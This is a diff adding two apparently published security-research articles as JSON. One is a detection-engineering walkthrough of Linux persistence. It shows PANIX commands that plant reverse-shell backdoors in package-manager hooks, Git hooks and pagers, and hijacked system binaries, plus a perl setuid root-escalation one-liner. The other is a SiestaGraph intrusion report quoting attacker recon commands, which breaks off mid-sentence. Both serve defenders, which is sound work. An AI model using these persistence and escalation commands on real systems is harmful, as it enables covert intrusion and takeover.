establishing the APT hook. After running `sudo apt update`, APT reads the configuration file and executes the payload, initiating the `sh` → `nohup` → `setsid` → `bash` reverse shell chain. Our coverage is multi-layered, and detects the following events:\n\n| Category | Coverage |\n|----------|---------------------------------------------------|\n| File | [APT Package Manager Configuration File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Suspicious APT Package Manager Execution](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_execution.toml) |\n| | [APT Package Manager Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_apt_package_manager_command_execution.toml) |\n| Network | [Suspicious APT Package Manager Network Connection](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_netcon.toml) |\n| | [APT Package Manager Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_apt_package_manager_egress_network_connection.toml) |\n\n### T1546.016 - installer packages (YUM)\n\n[YUM](https://man7.org/linux/man-pages/man8/yum.8.html) (Yellowdog Updater, Modified) is the default package management system used in Red Hat-based Linux distributions like CentOS and Fedora. YUM employs [plugin architecture](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/deployment_guide/sec-yum_plugins) to extend its functionality, allowing users to integrate custom scripts or programs that execute at various stages of the package management lifecycle. These plugins are stored in specific directories and can perform actions such as logging, security checks, or custom package handling.\n\nThe structure of YUM plugins typically involves placing them in directories like:\n\n* `/etc/yum/pluginconf.d/` (for configuration files)\n* `/usr/lib/yum-plugins/` (for plugin scripts)\n\nFor plugins to be enabled, the `/etc/yum.conf` file must have the `plugins=1` set. These plugins can intercept YUM operations, modify package installation behaviors, or execute additional actions before or after package transactions. YUM plugins are quite extensive, but a basic YUM plugin template might look like [this](http://yum.baseurl.org/wiki/WritingYumPlugins.html):\n\n```\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\n\nrequires_api_version = '2.3'\nplugin_type = (TYPE_CORE, TYPE_INTERACTIVE)\n\ndef init_hook(conduit):\n conduit.info(2, 'Hello world')\n\ndef postreposetup_hook(conduit):\n raise PluginYumExit('Goodbye')\n```\n\nEach plugin must be enabled through a `.conf` configuration file:\n\n```\n[main] enabled=1\n```\n\nSimilar to APT's configuration files, YUM plugins can be leveraged by attackers to execute malicious code during routine package management operations, particularly during automated processes like system updates, thereby establishing persistence on vulnerable systems.\n\n#### Persistence through T1546.016 - Installer Packages (YUM)\n\nSimilar to APT, YUM plugins should be crafted carefully to not interfere with the YUM update execution flow. Use [this example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2025-L2047) or set it up by running:\n\n```\n> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --yum\n[+] Yum persistence established\n```\n\nAfter planting the persistence mechanism, a command similar to `sudo yum upgrade` can be run to establish a reverse connection.\n\n persistence establishment\")\n\nWe see PANIX being executed, `/usr/lib/yumcon`, `/usr/lib/yum-plugins/yumcon.py` and `/etc/yum/pluginconf.d/yumcon.conf` being created. `/usr/lib/yumcon` is executed by `yumcon.py`, which is enabled in `yumcon.conf`. After updating the system, the reverse shell execution chain (`yum` → `sh` → `setsid` → `yumcon` → `python`) is executed. Similar to APT, our YUM coverage is multi-layered, and detects the following events:\n\n| Category | Coverage |\n|----------|-------------------------------------------------------|\n| File | [Yum Package Manager Plugin File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Yum/DNF Plugin Status Discovery](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_yum_dnf_plugin_detection.toml) |\n| Network | [Egress Connection by a YUM Package Manager Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_connection_by_a_yum_package_manager_descendant.toml) |\n\n### T1546.016 - installer packages (DNF)\n\n[DNF](https://man7.org/linux/man-pages/man8/dnf.8.html) (Dandified YUM) is the next-generation package manager used in modern Red Hat-based Linux distributions, including Fedora and CentOS. It replaces YUM while maintaining compatibility with YUM repositories and packages. Similar to YUM, DNF utilizes a [plugin system](https://docs.redhat.com/it/documentation/red_hat_enterprise_linux/9/html/managing_software_with_the_dnf_tool/assembly_configuring-yum_managing-software-with-the-dnf-tool#proc_enabling-and-disabling-yum-plug-ins_assembly_configuring-yum) to extend its functionality, enabling users to integrate custom scripts or programs that execute at key points in the package management lifecycle.\n\nDNF plugins enhance its capabilities by allowing customization and automation beyond standard package management tasks. These plugins are stored in specific directories:\n\n* `/etc/dnf/pluginconf.d/` (for configuration files)\n* `/usr/lib/python3.9/site-packages/dnf-plugins/` (for plugin scripts)\n\nOf course the location for the dnf-plugins are bound to the Python version that is running on your system. Similarly to YUM, to enable a plugin, `plugins=1` must be set in `/etc/dnf/dnf.conf`. An example of a DNF plugin can look like this:\n\n```\nimport dbus\nimport dnf\nfrom dnfpluginscore import _\n\nclass NotifyPackagekit(dnf.Plugin):\n\tname = \"notify-packagekit\"\n\n\tdef __init__(self, base, cli):\n\t\tsuper(NotifyPackagekit, self).__init__(base, cli)\n\t\tself.base = base\n\t\tself.cli = cli\n\tdef transaction(self):\n\t\ttry:\n\t\t\tbus = dbus.SystemBus()\n\t\t\tproxy = bus.get_object('org.freedesktop.PackageKit', '/org/freedesktop/PackageKit')\n\t\t\tiface = dbus.Interface(proxy, dbus_interface='org.freedesktop.PackageKit')\n\t\t\tiface.StateHasChanged('posttrans')\n\t\texcept:\n\t\t\tpass \n```\n\n\nAs for YUM, each plugin must be enabled through a `.conf` configuration file:\n\n```\n[main] enabled=1\n```\n\nSimilar to YUM's plugins and APT's configuration files, DNF plugins can be exploited by malicious actors to inject and execute unauthorized code during routine package management tasks. This attack vector extends to automated processes such as system updates, enabling persistent execution on systems with DNF-enabled repositories.\n\n#### Persistence through T1546.016 - installer packages (DNF)\n\nSimilar to APT and YUM, DNF plugins should be crafted carefully to not interfere with the DNF update execution flow. You can use the following [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2049-L2069) or set it up by running:\n\n```\n> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2013 --dnf\n> [+] DNF persistence established\n```\n\nRunning a command similar to `sudo dnf update` will trigger the backdoor. Take a look at the events:\n\n persistence establishment\")\n\nAfter the execution of PANIX, `/usr/lib/python3.9/site-packages/dnfcon`, `/etc/dnf/plugins/dnfcon.conf` and `/usr/lib/python3.9/site-packages/dnf-plugins/dnfcon.py` are created, and the backdoor is established. These locations are dynamic, based on the Python version in use. After triggering it through the `sudo dnf update` command, the `dnf` → `sh` → `setsid` → `dnfcon` → `python` reverse shell chain is initiated. Similar to before, our DNF coverage is multi-layered, and detects the following events:\n\n| Category | Coverage |\n|----------|-------------------------------------------------------|\n| File | [DNF Package Manager Plugin File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml)|\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Yum/DNF Plugin Status Discovery](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_yum_dnf_plugin_detection.toml) |\n| Network | [Egress Connection by a DNF Package Manager Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_connection_by_a_dnf_package_manager_descendant.toml) |\n\n### Hunting for persistence through T1546.016 - installer packages\n\nHunting for Package Manager persistence can be conducted through ES|QL and OSQuery. Indicators of compromise may include configuration and plugin file creations/modifications and unusual executions of APT/YUM/DNF parents. The [Persistence via Package Manager](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_package_manager.toml) rule contains several ES|QL/OSQuery queries that you can use to detect these abnormalities.\n\n## T1546 - event triggered execution: Git \n\n[Git](https://manpages.debian.org/stretch/git-man/git.1.en.html) is a distributed version control system widely used for managing source code and coordinating collaborative software development. It tracks changes to files and enables efficient team collaboration across different locations. This makes Git a system that is present in a lot of organizations across both workstations and servers. Two functionalities that can be (ab)used for arbitrary code execution are [Git hooks](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) and [Git pager](https://www.mslinn.com/git/200-git-pager.html). MITRE has no specific technique attributed to these persistence mechanisms, but they would best fit [T1546](https://attack.mitre.org/techniques/T1546/).\n\n### T1546 - event triggered execution: Git hooks\n\n[Git hooks](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) are scripts that Git executes before or after specific events such as commits, merges, and pushes. These hooks are stored in the `.git/hooks/` directory within each Git repository. They provide a mechanism for customizing and automating actions during the Git workflow. Common Git hooks include `pre-commit`, `post-commit`, `pre-merge`, and `post-merge`.\n\nAn example of a Git hook would be the file `.git/hooks/pre-commit`, with the following contents:\n\n```\n#!/bin/sh\n# Check if this is the initial commit\nif git rev-parse --verify HEAD >/dev/null 2>&1\nthen\n echo \"pre-commit: About to create a new commit...\"\n against=HEAD\nelse\n echo \"pre-commit: About to create the first commit...\"\n against=4b825dc642cb6eb9a060e54bf8d69288fbee4904\nfi\n```\n\nAs these scripts are executed on specific actions, and the contents of the scripts can be changed in whatever way the user wants, this method can be abused for persistence. Additionally, this method does not require root privileges, making it a convenient persistence technique for instances where root privileges are not yet obtained. These scripts can also be added to Github repositories prior to cloning, turning them into initial access vectors as well. \n\n### T1546 - event triggered execution: git pager\n\nA [pager](https://en.wikipedia.org/wiki/Terminal_pager) is a program used to view content one screen at a time. It allows users to scroll through text files or command output without the text scrolling off the screen. Common pagers include [less](https://www.commandlinux.com/man-page/man1/pager.1.html), [more](https://man7.org/linux/man-pages/man1/more.1.html), and [pg](https://man7.org/linux/man-pages/man1/pg.1.html). A [Git pager](https://www.mslinn.com/git/200-git-pager.html) is a specific use of a pager program to display the output of Git commands. Git allows users to configure a pager to control the display of commands such as `git log`.\n\nGit determines which pager to use through the following order of configuration:\n\n* `/etc/gitconfig` (system-wide)\n* `~/.gitconfig` or `~/.config/git/config` (user-specific)\n* `.git/config` (repository specific)\n\nA typical configuration where a pager is specified might look like this:\n\n```\n[core]\n pager = less\n```\n\nIn this example, Git is configured to use less as the pager. When a user runs a command like `git log`, Git will pipe the output through less for easier viewing. The flexibility in specifying a pager can be exploited. For example, an attacker can set the pager to a command that executes arbitrary code. This can be done by modifying the `core.pager` configuration to include malicious commands. Let’s take a look at the two techniques discussed in this section. \n\n### Persistence through T1546 - Git\n\nTo test these techniques, the system requires a cloned Git repository. There is no point in setting up a custom repository, as the persistence mechanism depends on user actions, making a hidden and unused Git repository an illogical construct. You could initialize your own hidden repository and chain it together with a `cron`/`systemd`/`udev` persistence mechanism to initialize the repository on set intervals, but that is out of scope for now.\n\nTo test the Git Hook technique, ensure a Git repository is available on the system, and run:\n\n```\n> ./panix.sh --git --default --ip 192.168.1.1 --port 2014 --hook\n```\n\n`> [+] Created malicious pre-commit hook in /home/ruben/panix`\n\nThe program loops through the entire filesystem (as far as this is possible, based on permissions), finds all of the repositories, and backdoors them. To trigger the backdoor, run `git add -A` and `git commit -m \"backdoored!\"`. This will generate the following events:\n\n\n\nIn this figure we see PANIX looking for Git repositories, adding a `pre-commit` hook and granting it execution permissions, successfully planting the backdoor. Next, the backdoor is initiated through the `git commit`, and the `git` → `pre-commit` → `nohup` → `setsid` → `bash` reverse shell connection is initiated.\n\nTo test the Git pager technique, ensure a Git repository is available on the system and run: \n\n```\n> ./panix.sh --git --default --ip 192.168.1.1 --port 2015 --pager\n> [+] Updated existing Git config with malicious pager in /home/ruben/panix\n> [+] Updated existing global Git config with malicious pager \n```\n\nTo trigger the payload, move into the backdoored repository and run a command such as `git log`. This will trigger the following events:\n\n\n\nPANIX executes and starts searching for Git repositories. Once found, the configuration files are updated or created, and the backdoor is planted. Invoking the Git Pager (`less`) executes the backdoor, setting up the `git` → `sh` → `nohup` → `setsid` → `bash` reverse connection chain. \n\nWe have several layers of detection, covering the Git Hook/Pager persistence techniques.\n\n| Category | Coverage |\n|----------|-----------------------------------------------------|\n| File | [Git Hook Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_file_creation.toml) |\n| Process | [Git Hook Child Process](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_process_execution.toml) |\n| | [Git Hook Command Execution](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_execution.toml) |\n| | [Linux Restricted Shell Breakout via Linux Binary(s)](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_evasion_linux_binary.toml) |\n| Network | [Git Hook Egress Network Connection](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_netcon.toml) |\n\n### Hunting for persistence through T1546 - Git\n\nHunting for Git Hook/Pager persistence can be conducted through ES|QL and OSQuery. Potential indicators include file creations in the `.git/hook/` directories, Git Hook executions, and the modification/creation of Git configuration files. The [Git Hook/Pager Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_git_hook_pager.toml) hunting rule has several ES|QL and OSQuery queries that will aid in detecting this technique.\n\n## T1548 - abuse elevation control mechanism: process capabilities\n\n[Process capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) are a fine-grained access control mechanism that allows the division of the root user's privileges into distinct units. These capabilities can be independently enabled or disabled for processes, and are used to enhance security by limiting the privileges of processes. Instead of granting a process full root privileges, only the necessary capabilities are assigned, reducing the risk of exploitation. This approach follows the principle of least privilege.\n\nTo better understand them, some use cases for process capabilities are e.g. assigning `CAP_NET_BIND_SERVICE` to a web server that needs to bind to port 80, assigning `CAP_NET_RAW` to tools that need access to network interfaces or assigning `CAP_DAC_OVERRIDE` to backup software requiring access to all files. By leveraging these capabilities, processes are capable of performing tasks that are usually only possible with root access.\n\nWhile process capabilities were developed to enhance security, once root privileges are acquired, attackers can abuse them to maintain persistence on a compromised system. By setting specific capabilities on binaries or scripts, attackers can ensure their malicious processes can operate with elevated privileges and allow for an easy way back to root access in case of losing it. Additionally, misconfigurations may allow attackers to escalate privileges. \n\nSome process capabilities can be (ab)used to establish persistence, escalate privileges, access sensitive data, or conduct other tasks. Process capabilities that can do this include, but are not limited to:\n\n* `CAP_SYS_MODULE` (allows loading/unloading of kernel modules)\n* `CAP_SYS_PTRACE` (enables tracing and manipulation of other processes)\n* `CAP_DAC_OVERRIDE` (bypasses read/write/execute checks)\n* `CAP_DAC_READ_SEARCH` (grants read access to any file on the system)\n* `CAP_SETUID`/`CAP_SETGID` (manipulate UID/GID)\n* `CAP_SYS_ADMIN` (to be honest, this just means root access)\n\nA simple way of establishing persistence is to grant the process `CAP_SETUID` or `CAP_SETGID` capabilities (this is similar to setting the `SUID`/`SGID` bit to a process, which we discussed in [the previous persistence blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms)). But all of the ones above can be used, be a bit creative here! MITRE does not have a technique dedicated to process capabilities. Similar to Setuid/Setgid, this technique can be leveraged for both privilege escalation and persistence. The most logical technique to add this mechanism to (based on the existing structure of the MITRE ATT&CK framework) would be [T1548](https://attack.mitre.org/techniques/T1548/). \n\n### Persistence through T1548 - process capabilities\n\nLet’s leverage PANIX to set up a process with `CAP_SETUID` process capabilities by running:\n\n```\n> sudo ./panix.sh --cap --default\n[+] Capability setuid granted to /usr/bin/perl\n[-] ruby, is not present on the system.\n[-] php is not present on the system.\n[-] python is not present on the system.\n[-] python3, is not present on the system.\n[-] node is not present on the system. \n```\n\nPANIX will by-default check for a list of processes that are easily exploitable after granting `CAP_SETUID` capabilities. You can use `--custom` and specify `--capability` and `--binary` to test some of your own. \n\nIf your system has `Perl`, you can take a look at [GTFOBins](https://gtfobins.github.io/gtfobins/perl/) to find how to escalate privileges with this capability set. \n\n```\n/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\n# whoami\nroot\n```\n\nLooking at the logs in Discover, we can see the following happening:\n\n\n\nWe can see PANIX being executed with `uid=0` (root), which grants `cap_setuid+ep` (effective and permitted) to `/usr/bin/perl`. Effective indicates that the capability is currently active for the process, while permitted indicates that the capability is allowed to be used by the process. Note that all events with `uid=0` have all effective/permitted capabilities set. After granting this capability and dropping down to user permissions, `perl` is executed and manipulates its own process UID to obtain root access. Feel free to try out different binaries/permissions.\n\nAs we have quite an extensive list of rules related to process capabilities (for discovery, persistence and privilege escalation activity), we will not list all of them here. Instead, you can take a look at [this blog post](https://www.elastic.co/security-labs/unlocking-power-safely-privilege-escalation-via-linux-process-capabilities), digging deeper into this topic.\n\n### Hunting for persistence through T1548 - process capabilities\n\nHunting for process capability persistence can be done through ES|QL. We can either do a general hunt and find non uid 0 binaries with capabilities set, or hunt for specific potentially dangerous capabilities. To do so, we created the [Process Capability Hunting](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_process_capabilities.toml) rule.\n\n## T1554 - compromise host software binary: hijacking system binaries\n\nAfter gaining access to a system and, if necessary, escalating privileges to root access, system binary hijacking/wrapping is another option to establish persistence. This method relies on the trust and frequent execution of system binaries by a user. \n\nSystem binaries, located in directories like `/bin`, `/sbin`, `/usr/bin`, and `/usr/sbin` are commonly used by users/administrators to perform basic tasks. Attackers can hijack these system binaries by replacing or backdooring them with malicious counterparts. System binaries that are used often such as `cat`, `ls`, `cp`, `mv`, `less` or `sudo` are perfect candidates, as this mechanism relies on the user executing the binary. \n\nThere are multiple ways to establish persistence through this method. The attacker may manipulate the system’s `$PATH` environment variable to prioritize a malicious binary over the regular system binary. Another method would be to replace the real system binary, executing arbitrary malicious code on launch, after which the regular command is executed.\n\nAttackers can be creative in leveraging this technique, as any code can be executed. For example, the system-wide `sudo`/`su` binaries can be backdoored to capture a password every time a user attempts to run a command with `sudo`. Another method can be to establish a reverse connection every time a binary is executed or a backdoor binary is called on each binary execution. As long as the attacker hides well and no errors are presented to the user, this technique is difficult to detect. MITRE does not have a direct reference to this technique, but it probably fits [T1554](https://attack.mitre.org/techniques/T1554/) best.\n\nLet’s take a look at what hijacking system binaries might look like. \n\n### Persistence through T1554 - hijacking system binaries\n\nThe implementation of system binary hijacking in PANIX leverages the wrapping of a system binary to establish a reverse connection to a specified IP. You can reference this [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2391-L2401) or set it up by executing:\n\n```\n> sudo ./panix.sh --system-binary --default --ip 192.168.1.1 --port 2016\n> [+] cat backdoored successfully.\n> [+] ls backdoored successfully.\n```\n\nNow, execute `ls` or `cat` to establish persistence. Let’s analyze the logs. \n\n\n\nIn the figure above we see PANIX executing, moving `/usr/bin/ls` to `/usr/bin/ls.original`. It then backdoors `/usr/bin/ls` to execute arbitrary code, after which it calls `/usr/bin/ls.original` in order to trick the user. Afterwards, we see `bash` setting up the reverse connection. The copying/renaming of system binaries and the hijacking of the `sudo` binary are captured in the following detection rules.\n\n| Category | Coverage |\n|----------|-------------------------------|\n| File | [System Binary Moved or Copied](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml) |\n| | [Potential Sudo Hijacking](https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_sudo_hijacking.toml) |\n\n### Hunting for persistence through T1554 - hijacking system binaries\n\nThis activity should be very uncommon, and therefore the detection rules above can be leveraged for hunting. Another way of hunting for this activity could be assembling a list of uncommon binaries to spawn child processes. To aid in this process we created the [Unusual System Binary Parent (Potential System Binary Hijacking Attempt)](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_unusual_system_binary_parent.toml) hunting rule.\n\n## Conclusion\n\nIn this part of our “Linux Detection Engineering” series, we explored more advanced Linux persistence techniques and detection strategies, including init systems, run control scripts, message of the day, udev (rules), package managers, Git, process capabilities, and system binary hijacking. If you missed the previous part on persistence, catch up [here](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).\n\nWe did not only explain each technique but also demonstrated how to implement them using [PANIX](https://github.com/Aegrah/PANIX). This hands-on approach allowed you to assess detection capabilities in your own security setup. Our discussion included detection and endpoint rule coverage and referenced effective hunting strategies, from ES|QL aggregation queries to live OSQuery hunts.\n\nWe hope you've found this format informative. Stay tuned for more insights into Linux detection engineering. Happy hunting!\n"
+ },
+ "title": "Linux Detection Engineering - A Sequel on Persistence Mechanisms",
+ "slug": "sequel-on-persistence-mechanisms",
+ "subtitle": "A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.",
+ "date": "2024-08-30",
+ "description": "In this final part of this Linux persistence series, we'll continue exploring persistence mechanisms on Linux systems, focusing on more advanced techniques and how to detect them.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "sequel-on-persistence-mechanisms.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "linux",
+ "persistence"
+ ]
+ },
+ "id": "security_labs_content-sequel_on_persistence_mechanisms-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md.json
new file mode 100644
index 00000000000..372148d6e33
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md.json
@@ -0,0 +1,45 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"SiestaGraph: New implant uncovered in ASEAN member foreign ministry\"\nslug: \"siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\"\ndate: \"2022-12-16\"\nsubtitle: \"Elastic Security Labs is tracking an active intrusion, by likely multiple threat actors, into the Foreign Affairs office of an ASEAN member.\"\ndescription: \"Elastic Security Labs is tracking likely multiple on-net threat actors leveraging Exchange exploits, web shells, and the newly discovered SiestaGraph implant to achieve and maintain access, escalate privilege, and exfiltrate targeted data.\"\nauthor:\n - slug: samir-bousseaden\n - slug: andrew-pease\n - slug: daniel-stepanic\n - slug: salim-bitam\n - slug: seth-goodwin\n - slug: devon-kerr\nimage: \"photo-edited09.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref2924\n - siestagraph\n - doorme\n---\n\n## Key takeaways\n\n- Likely multiple threat actors are accessing and performing live on-net operations against the Foreign Affairs Office of an ASEAN member using a likely vulnerable, and internet-connected, Microsoft Exchange server. Once access was achieved and secured, the mailboxes of targeted individuals were exported.\n- Threat actors deployed a custom malware backdoor that leverages the Microsoft Graph API for command and control, which we’re naming SiestaGraph.\n- A modified version of an IIS backdoor called DoorMe was leveraged with new functionality to allocate shellcode and load additional implants.\n\n## Preamble\n\nIn early December, Elastic Security Labs observed Powershell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member.\n\nIn spite of diverse security instrumentation observed during this activity, the threat actors were able to achieve:\n\n- The execution of malware on Exchange Servers, Domain Controllers, and workstations\n- Exfiltration of targeted user and group mailboxes\n- Deploy web shells\n- Move laterally to user workstations\n- Perform internal reconnaissance\n- Collect Windows credentials\n\nBecause the intrusion is ongoing and covers almost the entire MITRE ATT&CK framework, the analysis sections will use a timeline approach.\n\n> For a deep dive analysis of the SIESTAGRAPH, DOORME, or SHADOWPAD malware families, check out our [follow on publication](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns) that covers those in detail. In addition, there are associations between this campaign and others based on other observations and 3rd party reporting.\n>\n> _Updated: 2/2/2023_\n\n## Analysis\n\nThe investigation, which we’re tracking as REF2924, began with the execution of a Powershell command used to export a user mailbox. While this is a normal administrative function, the commands were executed with a process ancestry starting with the IIS Worker Process ( **w3wp.exe** ) as a parent process of **cmd.exe** , and **cmd.exe** executing Powershell.\n\nThese events started the investigation that later identified multiple threat actors within the contested network environment.\n\nThe first events observed from this cluster of activity were on November 26, 2022, with the detection of a malicious file execution on a Domain Controller. Because of this, it is likely [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) was deployed post-initial compromise and was deployed in “Detect” mode. Throughout our analysis, we observed other security instrumentation tools in the environment indicating the victim was aware of the intrusion and trying to evict the threat actors.\n\nBecause of the multiple malware samples achieving similar goals, various DLL sideloading observations, and the presence of a likely internet-connected Exchange server; we believe that there are multiple threat actors or threat groups working independently or in tandem with each other.\n\n### November 26–30, 2022\n\n#### Malware execution\n\nThe earliest known evidence of compromise occurred on November 26, 2022, with the execution of a file called **OfficeClient.exe** executed from \\*\\*C:\\ProgramData\\Microsoft\\*\\* on a Domain Controller.\n\n10-minutes after **OfficeClient.exe** was executed on the Domain Controller, another malicious file was executed on another Windows 2019 server. This file was called **Officeclient.exe** and executed from **c:\\windows\\pla\\*\\*. On November 28, 2022, **officeup.exe** was executed on this same Windows 2019 server from **C:\\programdata\\*\\*.\n\nOn November 29, 2022, the **OfficeClient.exe** file was executed on an Exchange server as **C:\\ProgramData\\OfficeCore.exe**.\n\nAll three of these files ( **OfficeClient.exe** , **Officeclient.exe** , and **OfficeCore.exe** ) have an original PE file name of **windowss.exe** , which is the file name assigned at compile time. We are naming this malware family “SiestaGraph” because of the long sleep timer and the way that the malware uses the Microsoft Graph API for command and control.\n\nAs of December 8, 2022, we observed a variant of SiestaGraph in [VirusTotal](https://www.virustotal.com/gui/file/50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54), uploaded from the Netherlands on October 14, 2022. SiestaGraph makes use of a .NET API [library](https://github.com/KoenZomers/OneDriveAPI) that functions as an alternative to using Microsoft Graph, which is an API to interact with Microsoft cloud, including Microsoft 365, Windows, and Enterprise Mobility + Security.\n\n#### Internal reconnaissance\n\nOn November 28, 2022, the threat actor began performing internal reconnaissance by issuing standard commands such as **whoami** , **hostname** , **tasklist** , etc. These commands were executed with a process ancestry starting with the IIS Worker Process ( **w3wp.exe** ) as a parent process of **cmd.exe** , and **cmd.exe** executing the commands.\n\n```\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"&whoami\n\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"&hostname\n\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"&tasklist\n```\n\nAdditional adversary reconnaissance was performed to enumerate local network assets as well as victim assets at embassies and consulates abroad. There has been no indication that this information has been subsequently exploited for additional access or information at this time.\n\nOn November 29, 2022, the threat actor began collecting domain user and group information with the **net user** and **net group** commands, again issued as child processes of **w3wp.exe** and **cmd.exe**. These commands confirmed that this was not an entirely scripted campaign and included an active operator by the fact that they forgot to add the **/domain** syntax to two of the 20 **net user** commands. While the **net user** command does not require the **/domain** syntax, the fact that this was only on two of the 20 occurrences, it was likely an oversight by the operator. This was the first of multiple typographical errors observed throughout this campaign.\n\n\n\n#### Exporting Exchange mailboxes\n\nOn November 28, 2022, the threat actor started to export user mailboxes, again using the **w3wp.exe** process as a parent for **cmd.exe** , and finally Powershell. The threat actor added the **Microsoft.Exchange.Management.PowerShell.SnapIn** module. This module provides the ability to manage Exchange functions using Powershell and was used to export the mailboxes of targeted Foreign Service Officers and saved them as PST files.\n\n\n\nIn the above example, the **Received -gt** and **Sent -gt** dates timebox the collection window as all emails sent and received after ( **gt** is an acronym for “greater than”) November 15, 2022. The timeboxing was not uniform across all mailboxes and this process was repeated multiple times. Again, in the above example from November 28, 2022, the timebox was for all sent and received emails from November 15, 2022, to the current date (November 28, 2022); on December 6, 2022, the mailbox was exported again, this time with a **gt** value of November 28, 2022, which was the date of the last export.\n\nIn another example in this phase, the threat actors targeted a mailbox called **csirt**. While this is unconfirmed, “csirt” is commonly an acronym for Cyber Security Incident Response Team.\n\n\n\nTaking into consideration the timebox used on the **csirt** export, if this is the industry standard acronym of CSIRT, the intrusion could have started as early as September 1, 2022, and the threat actors were monitoring the CSIRT to identify if their intrusion had been detected.\n\nThroughout this phase, a total of 24 mailboxes were exported.\n\nOnce the mailboxes were exported, the threat actor created a 7zip archive called **7.tmp** with a password of **huebfkaudfbaksidfabsdf**.\n\n\n\nThree of the mailboxes, one of which being the **csirt** mailbox, were archived individually. These three mailboxes were archived with a **.log.rar** or **.log** file extension.\n\n\n\nFinally, the threat actor created a 200m 7zip archive called **o.7z** and added the previously created, password-protected, **7.tmp** archive to it.\n\n\n\n#### IIS backdoor module\n\nOn November 28, 2022, we observed the loading of two DLL files, **Microsoft.Exchange.Entities.Content.dll** and **iisrehv.dll** through the execution of the **iissvcs** services using **svchost.exe**. Both **Microsoft.Exchange.Entities.Content.dll** and **iisrehv.dll** were loaded using the **iissvcs** module of the Windows Service Host through the execution of **C:\\Windows\\system32\\svchost.exe -k iissvcs**. These malicious IIS modules are loosely based on the [DoorMe](https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme) IIS backdoor.\n\n\n\n> For context, IIS is web server software developed by Microsoft and used within the Windows ecosystem to host websites and server-side applications. Starting on version 7.0, Microsoft extended IIS by adding a modular architecture that allows individual modules to be added or removed in order to achieve functionality depending on an environment’s needs. These modules represent individual features that the server can then use to process incoming requests.\n\nDuring the post-compromise stage, the adversary used the malicious IIS module as a passive backdoor monitoring all incoming HTTP requests. Depending on a tailor-made request by the operator, the malware will activate and process commands. This approach 